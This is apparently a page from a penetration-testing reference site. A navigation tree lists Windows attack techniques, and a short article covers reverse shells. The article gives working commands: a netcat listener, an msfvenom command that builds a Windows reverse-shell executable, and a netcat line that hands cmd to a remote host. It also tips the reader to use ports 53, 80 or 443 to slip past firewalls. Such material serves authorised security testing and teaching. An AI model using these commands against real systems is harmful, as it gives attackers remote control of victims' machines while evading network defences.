SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Post-exploitation #Reverse Shell

Reverse Shell

Once an RCE-type vulnerability is detected, we are able to create a reverse shell. On windows, often the only option for various types of exploits is to use a single standalone executable file. Here you have some options for establishing reverse shell connection.

IMPORTANT: When establishing reverse shells, remember to use common ports, e.g. 53, 80, 443. Then there is less chance that the outgoing connection will be blocked by the firewall.

Generators:

Listener on Linux:

rlwrap nc -lvnp $port

Standalone binary

# Generate standalone reverse shell binary using Msfvenom
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=$lhost LPORT=$lport 
 
# Usage (Windows):
./shell.exe

Netcat

Netcat executable for Windows (link):

# Usage
nc.exe $lhost $lport -e cmd

Children

Reverse Shell